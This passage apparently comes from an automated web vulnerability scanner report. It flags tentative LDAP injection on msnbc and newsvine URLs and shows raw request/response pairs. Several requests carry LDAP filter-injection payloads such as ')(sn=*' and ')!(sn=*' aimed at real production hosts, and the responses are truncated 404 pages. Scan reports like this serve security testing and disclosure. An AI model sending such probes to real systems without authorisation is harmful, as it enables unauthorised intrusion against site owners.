<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=285889559&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

2.21. http://www.msnbc.redacted/id/32359544/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.msnbc.redacted
Path:	/id/32359544/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 1f4e07eeaa6b77c9)(sn=* and 1f4e07eeaa6b77c9)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /1f4e07eeaa6b77c9)(sn=*/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Content-Length: 1245
Date: Sun, 30 Jan 2011 03:10:32 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">

</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /1f4e07eeaa6b77c9)!(sn=*/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 99408

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.msnbc.redacted" r (nz 1vz 1lz 1oz 1cz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.msnbc.redacted" r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" href="http://www.msnbc.redacted/id/3032091/device/rss/rss.xml" xmlns:media="http://search.yahoo.com/mrss/" /><link rel="alternate" type="application/rss+xml" title="MSNBC - Top Stories" href="http://rss.msnbc.redacted/id/3032091/device/rss/rss.xml"><script language="javascript" type="text/javascript">
this.nm_bo = function (o)
{
//newsmenu delay
if (nm_Enter)
{
window.clearTimeout(nm_Enter);
nm_Enter = 0;
}
// Get initiating button
if (o)
{
o2 = o.relatedTarget;
o = o.target;
}
else
{
o = window.event.srcElement;
o2 = window.ev
...[SNIP]...

2.22. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/help/faq

Issue detail

Request 1

GET /_nv/cms/*)(sn=*/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:12 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=2078587454&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=2078587454&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_nv/cms/*)!(sn=*/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:19:12 GMT
Content-Length: 15050
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=974779505&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=974779505&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

2.23. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/copyrightPolicy

Issue detail

Request 1

GET /*)(sn=*/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:23:02 GMT
Content-Length: 15041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=898516139&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=898516139&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /*)!(sn=*/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:23:03 GMT
Content-Length: 15051
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1554333003&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1554333003&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

2.24. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css

Issue detail

Request 1

GET /*)(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:20 GMT
Content-Length: 15042
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=513229026&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=513229026&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /*)!(sn=*/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:20 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1977279021&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1977279021&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

2.25. http://www.polls.newsvine.com/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads aa0cfe9036308053)(sn=* and aa0cfe9036308053)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /aa0cfe9036308053)(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1836156681&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1836156681&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

Request 2

GET /aa0cfe9036308053)!(sn=*/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=1885509883&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=1885509883&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
